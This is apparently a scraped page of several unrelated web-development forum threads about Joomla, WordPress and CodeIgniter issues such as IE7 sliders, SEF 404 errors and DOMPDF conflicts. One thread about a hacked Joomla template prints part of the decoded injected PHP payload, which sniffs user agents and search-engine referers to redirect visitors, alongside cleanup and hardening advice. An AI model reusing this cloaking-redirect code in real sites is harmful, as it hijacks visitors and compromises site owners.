Joomla 2.5 JHtml::_('sliders in frontend and ie7 - joomla

breaking my head on this problem:
I'm using Joomla! 2.5.8 and Virtuemart 2.0.14 and I'm loading the Joomla-internal slide-effect
<?php echo JHtml::_('sliders.start', 'my-slider', array('useCookie'=>'0', 'startOffset'=>-1));
into frontend.
It works as it should - except in IE7 (i don't care about IE6 anymore).
Well, the same code is used in joomla-backend, and there it is working in ie7.
Link to have a look at:
The slides can be found here, directly above add-to-cart-button (in den Warenkorb): Detailinformationen zum Produkt
BTW: tried it with jquery (google-apis); worked fine for the sliders, but the add-to-cart-message in vm-facebox didn't work anymore.
I hope someone can provide me some help; why is joomla jhtml-slider not working on ie7 in frontend.


Wordpress Ajax not working

I have updated wordpress 3.5.2 and using Elemen theme in my wordpress site.
The problem i am having is in admin side Ajax functionality is not working.
I have tried disabling all the plugins but that has not helped me till now.
I have used define( 'CONCATENATE_SCRIPTS', false ); in wp-config.php,
but even that hasn't been working for me.
by using console what error i got is like this
TypeError: switchEditors is undefined Source File: admin/post.php?post=761&action=edit#category-pop Line: 1
i dont know how to solve this.
Please guide me now what should i check to work it in my favor.

Joomla loading slow. Menu items not loading

Lately my Joomla website was not showing properly, only the background image was loading, and some minor things.
Somehow the page template (index.php) was changed and some extra code was added. Specifically, this code:
was introduced several times throughout the php code, which is causing slow loading times (about 15-20 seconds to load any page) in my website.
It appears your site was hacked, this means it can be hacked again.
If you're using Joomla 1.5 you should make upgrade to at least the 2.5.x line, if you can't make sure you using version 1.5.26.
Next check all the extensions you have installed against the VEL (Joomla!'s Vulnerable Extensions List)
Once you've done that, you should secure you site using products like AdminTools or similar highly rated products from the Site Protection section of the Joomla Extensions Directory etc.
By the way that particular payload was built to capture users referred to your site by search engines and redirect them to It decodes to this:
if (!$qazplm){
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"") or stristr($referer,"webalta") or stristr($referer,"") or stristr($referer,"") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"") or stristr($referer,"") or stristr($referer,"")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
I stumbled upon this comment and was finally able to solve my problem.
Just go to administration --> Extensions --> Template Manager. Go to the Templates section, select your template, select Edit main page template, and get your index.php rid of all those garbage function calls. Cleaning it solved the problem for me, now everything is back to normal, everything loads as fast as before and all the pages display properly.

Joomla 2.5: SEF links are not working

I migrated a Joomla 2.5 site to another hosting server. The homepage is showing up fine, but when I click on any other secondary pages, I get a 404 error. This only happens when the links are set to SEF. When SEF is turned off, the pages show normally.
Any one have a solution for this?

Joomla 2.5 language code in URL. How to disable?

I have Joomla 2.5 with built-it multilanguage system. Main language is russian and second is english.
In 2 specific articles I have iframes with src="/freeflight2/form.php". In russian version of the site the iframe loading correctly. But in english I get URL of iframe with language code: http://xxx/en/freefligh2/en/form.php which causing 404.
I also tried to write full url, but Joomla again inserting language code.
Is there any way to fix it?
Is this custom or within Joomla? If custom have you tried using JPATH to get the base path? If within Joomla are you using an editor like JCE to create the iframes?

Strange DOMPDF issue with Codeigniter

Just a quickie. I have tested DOMPDF in a Doctrine enabled Codeigniter 1.7.2 installation and everything works fine. However, when the Cart library and URL Helper are autoloaded as well, DOMPDF doesn't work. BUT, if you 'un-autoload' (ie. dont use) any one of Doctrine, the URL Helper or the Cart Library, DOMPDF works.
Is just a bit annoying as I need DOMPDF, Doctrine, the URL helper and the Cart Library all working together.
Could anyone suggest anything please. Any help very gratefully recieved.
mPDF is bloody brilliant and much much better than domPDF, it works in the same way too in that it reads in a html file with your php code placeholders or whatever to add the dynamic content. I have written a small tutorial on how to use it with Codeigniter if you need it.
If you're using DOMPDF 0.5.1 you could be running into conflicts between the __autoload() methods used by the various libraries. The 0.6.0 code base (currently in beta) has been updated to use spl_autoload_register() which helps to prevent auto-loading conflicts between different libraries.
